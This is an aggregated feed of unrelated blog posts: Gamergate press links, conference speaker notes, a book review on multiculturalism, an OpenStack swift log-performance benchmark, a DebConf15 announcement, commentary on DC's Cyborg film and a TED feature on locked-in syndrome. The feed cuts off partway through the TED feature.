  • Gamergate threats: Why it’s so hard to prosecute the people targeting Zoe Quinn and Anita Sarkeesian | Slate (October 17): “The light penalties attached to many of these online crimes also deter officials from taking them seriously, because the punishment doesn’t justify the resources required to investigate and prosecute them”
  • Of Gamers, Gates, and Disco Demolition: The Roots of Reactionary Rage | The Daily Beast (October 16): “Our various “culture wars” tend to boil down to one specific culture war, the one about men wanting to feel like Real Men and lashing out at the women who won’t let them.”
  • Gamergate in Posterity | The Awl (October 15): “Maybe there will be some small measure of accountability in the far future, not just for public figures and writers and activists, but for all the people who could not or would not see their “trolling” for what it really was. Maybe, when their kids ask them what they were like when they were young, they will have no choice but to say: I was a piece of shit. I was part of a movement. I marched, in my sad way, against progress. Don’t take my word for it. You can Google it!”

We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

Thanks to everyone who suggested links.


Planet Linux News: Speaker Feature: Denise Paolucci, Gernot Heiser

Denise Paolucci

Denise Paolucci

When Your Codebase Is Nearly Old Enough To Vote

11:35 am Friday 16th January 2015

Denise is one of the founders of Dreamwidth, a journalling site and open source project forked from Livejournal, and one of only two majority-female open source projects.

Denise has appeared at multiple open source conferences to speak about Dreamwidth, including OSCON 2010 and 2010.

For more information on Denise and her presentation, see here.

Gernot Heiser

Gernot Heiser

seL4 Is Free - What Does This Mean For You?

4:35pm Thursday 15th January 2015

Gernot is a Scientia Professor and the John Lions Chair for operating systems at the University of New South Wales (UNSW).

He is also leader of the Software Systems Research Group (SSRG) at NICTA. In 2006 he co-founded Open Kernel Labs (OK Labs, acquired in 2012 by General Dynamics) to commercialise his L4 microkernel technology

For more information on Gernot and his presentation, see here. You can follow him as @GernotHeiser and don’t forget to mention #LCA2015.

TED10 weird things I accidentally learned about New York

New York, . Here's one of my favorite images of it, Image: Wikipedia/George Schlegel lithographers

New York, New York, it’s a wonderful town! Here’s one of my favorite images of it, created by George Schlegel lithographers in 1873, while the Brooklyn Bridge was under construction. Image: Wikipedia

New York is a playground of absurdity. I’ve lived here on and off for the past decade. Since I ate my first workday lunch in a “park” in downtown Manhattan, I’ve been blindly accepting everyone’s inexplicable behavior in this city, not least of all the block-long cronut line I pass on my way to work every morning. So when I started curating the speaker program for TEDxNewYork — which is less than two weeks away — it seemed a productively impossible task: to expand my view beyond my own little pocket of the city.

New York is an extrovert, leading and looking forward, not looking underground, inside or backwards. So finding local speakers with ideas that haven’t yet surfaced has been surprisingly difficult. But during our curation research, my team and I fell down a lot of research rabbit holes, each leading to something we just didn’t know about New York’s underbelly. Doing research like this means a lot of nights on the Internet — Wikipedia lists, New Yorker archives, the tables of contents of academic publications, Reddit — but also just talking to people — to strangers in bars, to your friend about their dissertation, to others standing on the subway platform. Once people know you’re looking for local stories, they start volunteering weird information. When you hear about a person, place or thing from multiple sources before NPR or The New York Times has caught on, you start to connect the dots as to what’s about to break out.

Keeping your ear to the dirty Manhattan ground doesn’t always yield great TEDx Talks, but it does make for good watercooler conversation. Below, 10 facts we learned from our research that we thought you’d enjoy.

  1. City Hall used to be a place for “sturdy beggars.” In 1735, New York built its first almshouse where City Hall is today. According to urban archaeologist Alyssa Loorya, one of our speakers, “It served five groups: ‘Poor Needy Persons,’ ‘Idle Wandering Vagabonds,’ ‘Sturdy Beggars,’ ‘Parents of Bastard Children,’ and the ‘bastard’ children.”
  2. If you drop your Blackberry into the subway tracks, you can get it back from these guys. Dubbed “the fishermen of the subway” they use homemade tools to recover the things New Yorkers drop on the tracks.
  3. One fire hydrant and a badly designed parking spot can net the city $33,000 in a year. But: Thanks to speaker Ben Wellington, who first posted this data on his blog, the city also shows that it can self-correct.
  4. Some subway buskers have agents. We were surprised to discover this when we approached one.
  5. New York State is buying out 750 homes in Staten Island and Long Island as a strategy to protect against future hurricanes. The City, which normally favors rebuilding over demolishing, turned down residents, so the people of Staten Island went over their heads to the State. A friend in an urban planning program at MIT told me about this over a beer one night recently, and I can’t say I’ve met one Manhattanite who knows about it.
  6. The ubiquitous voice of subway announcements lives in Maine. Her name is Carolyn Hopkins, and she does non-New York gigs, too: She’s the voice of 200 different airports.
  7. As of June this year, New York now has a Morbid Anatomy Museum. You can take workshops there on some pretty weird stuff.
  8. There are only two states in the US that automatically charge 16- and 17-year-old as adults, and New York is one of them. Unhealthy jail systems have been in the news quite a bit since Preet Bharara, the US attorney in Manhattan, published a lengthy report in August on treatment of teens in Rikers Island. Now as solitary confinement for teens at Rikers comes to an end we turn to our speaker Ismael Nazario, who was in solitary in Rikers for over 300 days before ever being convicted of a crime, to hear his story.
  9. The James A. Farley Post Office, the enormous historic building next to Penn Station bears the inscription: “Neither snow nor rain nor heat nor gloom of night stays these couriers from the swift completion of their appointed rounds.” You can take a tour of the nearly empty building, or even have a fashion show. (You can also try to have a TEDx event there. Not that we would know.)
  10. Oh, and one thing everyone knows: The Rent is (still) 2 Damn High.

TEDxNewYork 2014 — themed “Grand, central” — will take place on November 1, in Williamsburg, Brooklyn. Find out more.

RacialiciousWho We Be Examines the War on Multiculuralism

“Color is not a human or a personal reality, it is a political reality.” – James Baldwin

This is not a book review, because Who We Be isn’t really a book. It’s more of a thoughtful examination of how the United States arrived at this point in racial history.

Long time friend of the blog Jeff Chang is the author of the American Book award winning Can’t Stop, Won’t Stop: A History of the Hip Hop Generation and editor of the anthology Total Chaos: The Art and Aesthetics of Hip Hop. To say we’ve been waiting for Who We Be is an understatement.

But in the introduction, Chang frames the core of the most recent case of racial backlash. Explaining the outsized reaction by some whites to President Obama, Chang notes:

In the 1830s white minstrels had put on blackface, creating space for the white working class to challenge the elite, while keeping Blacks locked into their racial place. Obama now appeared as a dual symbol of oppression. Because of his Blackness, he was even more of an outsider—and in that sense, even more American—than them. But he was also the president. His Blackness did not just confer moral and existential claims, it was backed by the power of the state.

And there went everything.

As much as we like to talk about the inevitability of America being majority-minority in 2042, the events playing out across the nation show that most places are outright hostile to the idea that people of color are equal Americans, with the same rights, privileges, representation, and agenda setting power bestowed to whites. Chang turns his critical eye to shifts in culture which becomes documentation of rise (and fall?) of multiculturalism.

The opening chapter is on the funny pages and American comic culture acting as a barometer for race relations. Chang finds amazing gems – Morrie Turner’s Wee Pals frames the narrative since Turner was the first black syndicated cartoonist, but we also hear about the work of Jackie Ormes, Gus Arriola, Barbara Brandon-Croft, Ray Billingsley, George Harriman, Robb Armstrong, and Oliver Harrington.

Chang also points to the variety of issues at play in cartoons like the friendly Sambo model that led to popular characters like Felix the Cat, Mickey Mouse, and Bugs Bunny. Racism was even in the inking -comics used three colors: black, white, and the pinkish “flesh” tone. Anyone who did not conform became odd tones of purple. The modern world of comics hasn’t improved much – even with established cartoonists like Lalo Alcaraz and Keith Knight doing their thing, the Sunday comics pages have stubbornly resisted full integration.

From comics, Chang moves to art and the marketing of identity. Then on to politics, culture,The DREAMers, politics, war, neoliberalism, capitalism Occupy Wall Street and more in a bid to make racial sense of the country’s political mood.

While reading, one could wonder if society learned anything from the past 40 years? Or has polite society only learned to spout the “correct” answers? Later in the book, Chang discusses the phenomenon of people saying they want diversity, but seeing the reality play out in one of the biggest areas of segregation in America – housing:

How much did Americans value diversity and integration? Over the course of four decades, the Gallup survey had asked whites, “Would you move if great numbers of Blacks moved into your neighborhood?” In 1958, 79% said they would. In 1997, 75% said they would not. A month after Obama’s victory, a report from the Pew Research Center showed that almost 2 in 3 Americans—including 52% of Republicans, 60% of whites, 83% of Blacks, and 76% of 18-29 year olds—said that they preferred to live in a community made up of people who were a mix of different races. The numbers were similar for religious, political, and socioeconomic diversity.

Fully 68% of those making $100,000 or more a year—a significantly larger proportion than every other income bracket—said they preferred to live in a community with a mix of economic classes. But when Stanford professors Sean F. Reardon and Kendra Bischoff examined the data from 1970 to 2009, they found that not only had residential segregation by income soared, the wealthy had segregated themselves the fastest.

Large majorities told pollsters they wanted integrated schools and diversity in education. Pundits and politicians would often trot out such these polls as cause for optimism around racial justice issues. But in light of the actual social facts, the survey data looked less like an emerging consensus for cultural equity than evidence that multiculturalism had made some better primed to answer the questions “correctly.” For in this colorized generation, public schools were resegregating at a dramatic rate.

By 2010, 80% of Latinos and 74% of Blacks attended majority non-white schools. Around 40% of Blacks and Latinos in public schools attended hypersegregated schools in which 90-100% of the students were nonwhite. Blacks and Latinos were also twice as likely to attend a school predominantly serving low-income students than white or Asian students. White students were the most racially isolated of all—the average white student attended a school that was 75% white.

Resegregation did not escape even the rapidly diversifying suburbs or the most liberal strongholds. From city to exurb, the San Francisco Bay Area— one of the nation’s most diverse regions, the birthplace of the multiculturalism movement, and the site of Berkeley’s national model public school desegregation program—also boasted California’s highest rates of White isolation. Although white students made up only 28% of the Bay Area’s student-age population, 65% of them attended majority white schools. Those schools were eight times less likely than predominantly non-white ones to be deemed “high-problem” schools.

After 1968, busing, court orders, and district plans had helped to integrate the schools from the deep South to the Northwest. In turn school desegregation climbed sharply and peaked in the late 1980s. But then conservative challenges to desegregation mounted, and anti-integrationists began to accumulate victories in the courts and the legislatures. During the 1990s, while multiculturalists were winning the battle to change school curriculum and staffing, they were losing the battle to desegregate the next generation of public school students. By the new millennium, the same southern school systems that had made the most progress toward integration were the fastest to resegregate. Progress had always been fragile.

The book ends on equal parts heartbreak and hope, juxtaposing a few different stories to paint a picture of where we are.

The ambiguous ending fits the overall theme of the book – after all, isn’t that what we go through as people of color everyday?

Ultimately, Who We Be can feel a little disjointed – condensing America’s entire racial history in imagery is a major feat, and the book is much better at raising ideas and questions than providing concrete answers. But anyone who cares about racial equity should read this book – if for nothing else than to supply the foundation for our action.

Racialicious is giving away a copy of Who We Be. To enter, leave a comment addressing this question: “What does multiculturalism mean now and what needs to happen next?”

The post Who We Be Examines the War on Multiculuralism appeared first on Racialicious - the intersection of race and pop culture.

Oreilly Linux PlanetTizen Cookbook

Tizen is an open source Linux-based software platform for a variety of devices, from smartphones and watches to in-vehicle infotainment. Application development is based on open standards and HTML5 is the primary development technology.

Starting with a detailed description of using the Tizen SDK, you will delve into Tizen development on Linux, Windows, and Mac OS with this book. You will learn to use the Tizen IDE and move on to using the web simulator and device emulator.

The recipes in this book are invaluable in exploring and optimizing Tizen to develop exciting mobile and web applications.

Geek FeminismQuick hit: A good example of how to handle trolls

With his permission, I’m reposting this blog comment from Marco Rogers, in a reply to an anti-feminist comment on a blog post about women in tech that he wrote 2 1/2 years ago. Although the post is that old, the comment is from a few days ago, because even years later, anti-feminist trolls are stumbling across Marco’s blog post and feeling the need to express their displeasure with it.

I’m reposting Marco’s comment because I think it’s a good example about how to respond to a troll. I would love to see more men let their anti-feminist peers know that uninformed anti-feminist wankery is a waste of time. And I would love to do that more often myself, rather than engaging with it.

Hi [REDACTED]. I thought a long time about whether to let this comment stand or delete it. I do listen to input from different perspectives. I read this entire thing. And I’m sorry to say it was a waste of my time.

I’m afraid this reply won’t be very constructive. I had to chose whether to waste further time dismantling your false logic, and I had to take into account whether it would make any difference to you or anyone reading. I don’t think it will. In my experience, it’s very difficult to educate men who think like you do.

I’ll admit it also annoys me that you would come and write a small novel in my blog comments but not say anything new or original. Men have been making this argument that their long history of sexism is somehow the natural order of things since the beginning of time. It’s not revelatory, it’s not some profound wisdom that people haven’t heard, it’s boring. The feminist/womanist movement grew in direct opposition to all the nonsense you spouted above. There is a ton of literature that debunks and rejects every single point you are poorly trying to make. The least you can do is educate yourself on the system you’re up against, so you can sound more cogent and have an actual chance of convincing anyone.

The question remains of whether I let your comment stay up. I think I will. Not because I feel compelled to represent multiple viewpoints here. This is my blog and I choose what goes here. But I’ll leave it because I’m no longer afraid of letting people read tripe like this. You’re losing. We WILL create a world where the mentality of men like you is a minority and women get to exist as themselves without fear. You can’t stop it. Stay mad bro. Thanks for dropping by.

Planet DebianDebConf team: DebConf15 dates are set, come and join us! (Posted by DebConf15 team)

At DebConf14 in Portland, Oregon, USA, next year’s DebConf team presented their conference plans and announced the conference dates: DebConf15 will take place from 15 to 22 August 2015 in Heidelberg, Germany. On the Open Weekend on 15/16 August, we invite members of the public to participate in our wide offering of content and events, before we dive into the more technical part of the conference during following week. DebConf15 will also be preceeded by DebCamp, a time and place for teams to gather for intensive collaboration.

A set of slides from a quick show-case during the DebConf14 closing ceremony provide a quick overview of what you can expect next year. For more in-depth information, we invite you to watch the video recording of the full session, in which the team provides detailed information on the preparations so far, location and transportation to the venue at Heidelberg, the different rooms and areas at the Youth Hostel (for accommodation, hacking, talks, and social activities), details about the infrastructure that are being worked on, and the plans around the conference schedule.

We invite everyone to join us in organising this conference. There are different areas where your help could be very valuable, and we are always looking forward to your ideas. Have a look at our wiki page, join our IRC channels and subscribe to our mailing lists.

We are also contacting potential sponsors from all around the globe. If you know any organisation that could be interested, please consider handing them our sponsorship brochure or contact the fundraising team with any leads.

Let’s work together, as every year, on making the best DebConf ever!

Planet Linux AustraliaJoshua Hesketh: OpenStack infrastructure swift logs and performance

Turns out I’m not very good at blogging very often. However I thought I would put what I’ve been working on for the last few days here out of interest.

For a while the OpenStack Infrastructure team have wanted to move away from storing logs on disk to something more cloudy – namely, swift. I’ve been working on this on and off for a while and we’re nearly there.

For the last few weeks the openstack-infra/project-config repository has been uploading its CI test logs to swift as well as storing them on disk. This has given us the opportunity to compare the last few weeks of data and see what kind of effects we can expect as we move assets into an object storage.

  • I should add a disclaimer/warning, before you read, that my methods here will likely make statisticians cringe horribly. For the moment though I’m just getting an indication for how things compare.

The set up

Fetching files from an object storage is nothing particularly new or special (CDN’s have been doing it for ages). However, for our usage we want to serve logs with os-loganalyze giving the opportunity to hyperlink to timestamp anchors or filter by log severity.

First though we need to get the logs into swift somehow. This is done by having the job upload its own logs. Rather than using (or writing) a Jenkins publisher we use a bash script to grab the jobs own console log (pulled from the Jenkins web ui) and then upload it to swift using credentials supplied to the job as environment variables (see my zuul-swift contributions).

This does, however, mean part of the logs are missing. For example the fetching and upload processes write to Jenkins’ console log but because it has already been fetched these entries are missing. Therefore this wants to be the very last thing you do in a job. I did see somebody do something similar where they keep the download process running in a fork so that they can fetch the full log but we’ll look at that another time.

When a request comes into, a request is handled like so:

  1. apache vhost matches the server
  2. if the request ends in .txt.gz, console.html or console.html.gz rewrite the url to prepend /htmlify/
  3. if the requested filename is a file or folder on disk, serve it up with apache as per normal
  4. otherwise rewrite the requested file to prepend /htmlify/ anyway

os-loganalyze is set up as an WSGIScriptAlias at /htmlify/. This means all files that aren’t on disk are sent to os-loganalyze (or if the file is on disk but matches a file we want to mark up it is also sent to os-loganalyze). os-loganalyze then does the following:

  1. Checks the requested file path is legitimate (or throws a 400 error)
  2. Checks if the file is on disk
  3. Checks if the file is stored in swift
  4. If the file is found markup (such as anchors) are optionally added and the request is served
    1. When serving from swift the file is fetched via the swiftclient by os-loganlayze in chunks and streamed to the user on the fly. Obviously fetching from swift will have larger network consequences.
  5. If no file is found, 404 is returned

If the file exists both on disk and in swift then step #2 can be skipped by passing ?source=swift as a parameter (thus only attempting to serve from swift). In our case the files exist both on disk and in swift since we want to compare the performance so this feature is necessary.

So now that we have the logs uploaded into swift and stored on disk we can get into some more interesting comparisons.

Testing performance process

My first attempt at this was simply to fetch the files from disk and then from swift and compare the results. A crude little python script did this for me:

The script fetches a copy of the log from disk and then from swift (both through os-loganalyze and therefore marked-up) and times the results. It does this in two scenarios:

  1. Repeatably fetching the same file over again (to get a good average)
  2. Fetching a list of recent logs from gerrit (using the gerrit api) and timing those

I then ran this in two environments.

  1. On my local network the other side of the world to the logserver
  2. On 5 parallel servers in the same DC as the logserver

Running on my home computer likely introduced a lot of errors due to my limited bandwidth, noisy network and large network latency. To help eliminate these errors I also tested it on 5 performance servers in the Rackspace cloud next to the log server itself. In this case I used ansible to orchestrate the test nodes thus running the benchmarks in parallel. I did this since in real world use there will often be many parallel requests at once affecting performance.

The following metrics are measured for both disk and swift:

  1. request sent – time taken to send the http request from my test computer
  2. response – time taken for a response from the server to arrive at the test computer
  3. transfer – time taken to transfer the file
  4. size – filesize of the requested file

The total time can be found by adding the first 3 metrics together.



Home computer, sequential requests of one file


The complementary colours are the same metric and the darker line represents swift’s performance (over the lighter disk performance line). The vertical lines over the plots are the error bars while the fetched filesize is the column graph down the bottom. Note that the transfer and file size metrics use the right axis for scale while the rest use the left.

As you would expect the requests for both disk and swift files are more or less comparable. We see a more noticable difference on the responses though with swift being slower. This is because disk is checked first, and if the file isn’t found on disk then a connection is sent to swift to check there. Clearly this is going to be slower.

The transfer times are erratic and varied. We can’t draw much from these, so lets keep analyzing deeper.

The total time from request to transfer can be seen by adding the times together. I didn’t do this as when requesting files of different sizes (in the next scenario) there is nothing worth comparing (as the file sizes are different). Arguably we could compare them anyway as the log sizes for identical jobs are similar but I didn’t think it was interesting.

The file sizes are there for interest sake but as expected they never change in this case.

You might notice that the end of the graph is much noisier. That is because I’ve applied some rudimentary data filtering.

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 54.89516183 43.71917948 56.74750291 194.7547117 849.8545127 838.9172066 7.121600095 7.311125275
Mean 283.9594368 282.5074598 373.7328851 531.8043908 5091.536092 5122.686897 1219.804598 1220.735632


I know it’s argued as poor practice to remove outliers using twice the standard deviation, but I did it anyway to see how it would look. I only did one pass at this even though I calculated new standard deviations.


request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 13.88664039 14.84054789 44.0860569 115.5299781 541.3912899 515.4364601 7.038111654 6.98399691
Mean 274.9291111 276.2813889 364.6289583 503.9393472 5008.439028 5013.627083 1220.013889 1220.888889


I then moved the outliers to the end of the results list instead of removing them completely and used the newly calculated standard deviation (ie without the outliers) as the error margin.

Then to get a better indication of what are average times I plotted the histograms of each of these metrics.

Here we can see a similar request time.

Here it is quite clear that swift is slower at actually responding.

Interestingly both disk and swift sources have a similar total transfer time. This is perhaps an indication of my network limitation in downloading the files.


Home computer, sequential requests of recent logs

Next from my home computer I fetched a bunch of files in sequence from recent job runs.



Again I calculated the standard deviation and average to move the outliers to the end and get smaller error margins.

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 54.89516183 43.71917948 194.7547117 56.74750291 849.8545127 838.9172066 7.121600095 7.311125275
Mean 283.9594368 282.5074598 531.8043908 373.7328851 5091.536092 5122.686897 1219.804598 1220.735632
Second pass without outliers
Standard Deviation 13.88664039 14.84054789 115.5299781 44.0860569 541.3912899 515.4364601 7.038111654 6.98399691
Mean 274.9291111 276.2813889 503.9393472 364.6289583 5008.439028 5013.627083 1220.013889 1220.888889


What we are probably seeing here with the large number of slower requests is network congestion in my house. Since the script requests disk, swift, disk, swift, disk.. and so on this evens it out causing a latency in both sources as seen.

Swift is very much slower here.


Although comparable in transfer times. Again this is likely due to my network limitation.

The size histograms don’t really add much here.

Rackspace Cloud, parallel requests of same log

Now to reduce latency and other network effects I tested fetching the same log over again in 5 parallel streams. Granted, it may have been interesting to see a machine close to the log server do a bunch of sequential requests for the one file (with little other noise) but I didn’t do it at the time unfortunately. Also we need to keep in mind that others may be access the log server and therefore any request in both my testing and normal use is going to have competing load.

I collected a much larger amount of data here making it harder to visualise through all the noise and error margins etc. (Sadly I couldn’t find a way of linking to a larger google spreadsheet graph). The histograms below give a much better picture of what is going on. However out of interest I created a rolling average graph. This graph won’t mean much in reality but hopefully will show which is faster on average (disk or swift).

You can see now that we’re closer to the server that swift is noticeably slower. This is confirmed by the averages:


  request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 32.42528982 9.749368282 245.3197219 781.8807534 1082.253253 2737.059103 0 0
Mean 4.87337544 4.05191168 39.51898688 245.0792916 1553.098063 4167.07851 1226 1232
Second pass without outliers
Standard Deviation 1.375875503 0.8390193564 28.38377158 191.4744331 878.6703183 2132.654898 0 0
Mean 3.487575109 3.418433003 7.550682037 96.65978872 1389.405618 3660.501404 1226 1232


Even once outliers are removed we’re still seeing a large latency from swift’s response.

The standard deviation in the requests now have gotten very small. We’ve clearly made a difference moving closer to the logserver.


Very nice and close.

Here we can see that for roughly half the requests the response time was the same for swift as for the disk. It’s the other half of the requests bringing things down.

The transfer for swift is consistently slower.


Rackspace Cloud, parallel requests of recent logs

Finally I ran just over a thousand requests in 5 parallel streams from computers near the logserver for recent logs.


Again the graph is too crowded to see what is happening so I took a rolling average.



request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 0.7227904332 0.8900549012 434.8600827 909.095546 1913.9587 2132.992773 6.341238774 7.659678352
Mean 3.515711867 3.56191383 145.5941102 189.947818 2427.776165 2875.289455 1219.940039 1221.384913
Second pass without outliers
Standard Deviation 0.4798803247 0.4966553679 109.6540634 171.1102999 1348.939342 1440.2851 6.137625464 7.565931993
Mean 3.379718381 3.405770445 70.31323922 86.16522485 2016.900047 2426.312363 1220.318912 1221.881335


The averages here are much more reasonable than when we continually tried to request the same file. Perhaps we’re hitting limitations with swifts serving abilities.


I’m not sure why we have sinc function here. A network expert may be able to tell you more. As far as I know this isn’t important to our analysis other than the fact that both disk and swift match.

Here we can now see swift keeping a lot closer to disk results than when we only requested the one file in parallel. Swift is still, unsurprisingly, slower overall.

Swift still loses out on transfers but again does a much better job of keeping up.

Error sources

I haven’t accounted for any of the following swift intricacies (in terms of caches etc) for:

  • Fetching random objects
  • Fetching the same object over and over
  • Fetching in parallel multiple different objects
  • Fetching the same object in parallel

I also haven’t done anything to account for things like file system caching, network profiling, noisy neighbours etc etc.

os-loganalyze tries to keep authenticated with swift, however

  • This can timeout (causes delays while reconnecting, possibly accounting for some spikes?)
  • This isn’t thread safe (are we hitting those edge cases?)

We could possibly explore getting longer authentication tokens or having os-loganalyze pull from an unauthenticated CDN to add the markup and then serve. I haven’t explored those here though.

os-loganalyze also handles all of the requests not just from my testing but also from anybody looking at OpenStack CI logs. In addition to this it also needs to deflate the gzip stream if required. As such there is potentially a large unknown (to me) load on the log server.

In other words, there are plenty of sources of errors. However I just wanted to get a feel for the general responsiveness compared to fetching from disk. Both sources had noise in their results so it should be expected in the real world when downloading logs that it’ll never be consistent.


As you would expect the request times are pretty much the same for both disk and swift (as mentioned earlier) especially when sitting next to the log server.

The response times vary but looking at the averages and the histograms these are rarely large. Even in the case where requesting the same file over and over in parallel caused responses to go slow these were only in the magnitude of 100ms.

The response time is the important one as it indicates how soon a download will start for the user. The total time to stream the contents of the whole log is seemingly less important if the user is able to start reading the file.

One thing that wasn’t tested was streaming of different file sizes. All of the files were roughly the same size (being logs of the same job). For example, what if the asset was a few gigabytes in size, would swift have any significant differences there? In general swift was slower to stream the file but only by a few hundred milliseconds for a megabyte. It’s hard to say (without further testing) if this would be noticeable on large files where there are many other factors contributing to the variance.

Whether or not these latencies are an issue is relative to how the user is using/consuming the logs. For example, if they are just looking at the logs in their web browser on occasion they probably aren’t going to notice a large difference. However if the logs are being fetched and scraped by a bot then it may see a decrease in performance.

Overall I’ll leave deciding on whether or not these latencies are acceptable as an exercise for the reader.

RacialiciousOn DC Entertainment, Cyborg, And Going Back To The Afrofuture

By Arturo R. García

DC Entertainment scored a rare PR victory over archrival Marvel over the weekend when it announced its upcoming slate of films. At first glance, this latest take on the DC movie universe instantly puts Marvel’s to shame when it comes to inclusion.

But besides the far-flung timetable involved, it very much remains to be seen whether the company is willing to put in the work to elevate its non-white heroes to a position befitting their upcoming roles on the big screen.

Here’s how the schedule looks, courtesy of Slate:

Not only does this signal the long-awaited arrival of Wonder Woman in her own solo feature, but the Flash movie will be led by a queer actor in Ezra Miller. And that’s before getting to the two POC leads in Jason Momoa’s Aquaman and, perhaps more surprisingly, Ray Fisher starring as Cyborg.

Ray Fisher (right) will play Cyborg for DC Entertainment. image via

If you’ve never heard of Fisher, don’t be surprised; according to IMDB, his appearance in Batman v. Superman: Dawn of Justice will constitute his first major on-screen role. No pressure, right?

But look at the timeline again. Throw in Dwayne “The Rock” Johnson appearing in Shazam, and it’s likely that POC will not be prominent in a DCE film for at least three years. The X-factor here is Suicide Squad, which appears to be on the fast track and should by all rights include Amanda Waller. Even if it means the “sexy” version unveiled three years ago as part of the company’s comics relaunch.

A cynical observer might point out that waiting until 2018 for an Aquaman film starring Momoa and Fisher’s starring role two years(!) later gives DC enough time to scuttle their plans if Dawn of Justice is as much of a disappointment as Man of Steel. Or that Aquaman and Cyborg’s position in the movie pipeline reflects their standing within the Justice League. They’re such valued members that the Suicide Squad got the nod first, and Cyborg has to wait for two Justice League movies before getting his shot. A cynic might argue that the only reason Cyborg isn’t dead last is because Ryan Reynolds’ turn as Hal Jordan was enough of a flop that the Green Lantern movie brand still hasn’t recovered.

Cyborg in the “Super Powers Team: Galactic Guardians” cartoon. Image via DC Wikia.

On the bright side, DC now has no excuse to decisively elevate Cyborg into the top tier of its roster, even if most sensible fans wish John Stewart were getting that same treatment. It’s important to remember, first of all, that Victor Stone’s inclusion in the Justice League’s “New 52″ comics roster isn’t without precedent; in 1985, the character was featured on the Super Powers Team: Galactic Guardians animated series, the final incarnation of the venerable SuperFriends franchise.

Cyborg on the cover of “Tales of the New Teen Titans” #1, as published in June 1982. Image via Wikipedia.

Then, as now, Cyborg was the junior member of the team — the POV character for the audience and the team’s designated IT person. Which probably seemed fine to casual viewers, but was in fact a reduction of his much larger role in DC’s hottest property of that time, the Teen Titans comic. As conceived by Marv Wolfman and George Perez, the Victor Stone of the ’80s had the benefit of a full journey from being horrified at his condition to eventually leading the team and forging a new family relationship with them.

But just as John Stewart went from a stalwart hero to one with a higher profile thanks to the Justice League and Justice League Unlimited series, another version of the Titans brand put Cyborg in the public eye:

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="420"></iframe>

Cyborg in the “Teen Titans Go!” animated series. Image via

It’s very possible that, to non-comics fans, their image of Cyborg is of the high-appetite, high-energy version from Teen Titans Go!. A funny guy, sure, but maybe not the kind of hero that’s going to fill up a multiplex. If DC is serious about making the character the next great POC movie superhero, we’d like to argue that the company needs to split the difference: show his traumatic origin, sure, but take him beyond the JLA’s sidekick and let his film reach for the afrofuturistic heights he’s perfectly positioned to reach. A movie-going public living in an increasingly tech-reliant world could really get behind a hero who can plumb the depths of the grid from anywhere in the physical world. If DC wants to end its “phase one” with a bang, it needs to stop treating Cyborg like the last one in line, and understand that for this position in pop culture, he’s the first of his kind.

The post On DC Entertainment, Cyborg, And Going Back To The Afrofuture appeared first on Racialicious - the intersection of race and pop culture.

TEDWhat’s it like to live with locked-in syndrome? One family’s experience

TED Fellow Kitra Cahana shares the story of her father at TEDMED. Photo: Courtesy of TEDMED

Kitra Cahana shares the extraordinary story of her father’s brain stem stroke, a catastrophe that transformed into an inspiring spiritual journey. Photo: TEDMED

Three years ago, Rabbi Ronnie Cahana suffered a rare brain stem stroke that left him fully conscious, yet his entire body paralyzed. It’s a condition known as “locked-in syndrome.”

Last month, TED Fellow Kitra Cahana spoke of her father’s experience at TEDMED (watch her talk, “My father, locked in his body but soaring free”), revealing how her family cocooned Rabbi Cahana in love, and how a system of blinking, in response to the alphabet, patiently allowed him to dictate poems, sermons and letters to his loved ones and to his congregation.

Kitra began documenting her father’s recovery in photographs and video, creating layered images that — in contrast to her photojournalistic work — are more abstract and emotional. “I wanted to try to find a way to take photographs that reflected the mystical things that were happening in the hospital room,” she says. “How do I explain, in a photograph, the power that another human being has to either add or detract from the healing of another person? I started a process of trying to tell a story in images.”

As Rabbi Cahana began to regain his ability to speak, Kitra started recording his voice. She is now in the process of developing this body of work for an exhibition to help raise support for his ongoing care and rehabilitation.

Below, see Kitra’s stunning images — accompanied by her father’s poems — and hear more about the thoughts behind them. But first, a Q&A with Rabbi Cahana himself, in which he describes his own experience.

Rabbi Cahana writes: "You have to believe you’re paralyzed to play the part of a quadriplegic. I don’t. In my mind and in my dreams every night I Chagall-man float over the city, twirl and swirl, with my toes kissing the floor. I know nothing about this statement of man without motion. Everything has motion. The heart pumps, the body heaves, the mouth moves, the eyes turn inside-out.  We never stagnate. Life triumphs up and down." Image: Kitra Cahana

Rabbi Cahana writes, “You have to believe you’re paralyzed to play the part of a quadriplegic. I don’t. In my mind and in my dreams, every night I Chagall-man float over the city, twirl and swirl, with my toes kissing the floor. I know nothing about this statement of man without motion. Everything has motion. The heart pumps, the body heaves, the mouth moves, the eyes turn inside-out. We never stagnate. Life triumphs up and down.” Image: Kitra Cahana

Rabbi Cahana answers our questions on being locked in

Can you tell us what happened, from your point of view?

In July of 2011, upon returning from a weeklong visit to my mother and sister’s home in Houston, I had a stroke that shut down my body into a complete paralysis besides my mind and my uneasy use of my weakened, blurred eyes. Locked-in syndrome, they called it. “The air weighs a hundred pounds,” I wanted to say to anyone who was interested.

I was not in discomfort. I felt the sensation of touch on me, and surrounding me. I was sure that I had a helmet over my head to safeguard me. My neck itself seemed to weigh fifty pounds. A mysterious tortoise-shell immediately clasped me and kept me safe whenever needed. With my torso secure, my limbs felt doubled — the wooden petrified ones tethered by leather straps to ones jumping and slapping around. It was my duty to bring these fiery, spirited, animated parts to merge with my outer deadwood. I worked incessantly through sleepless nights and tyrannical days to fuse the miniature into the large. I kept hearing sirens from outside the hospital interrupting this task. It took about a year until each member became whole again, until they became one.

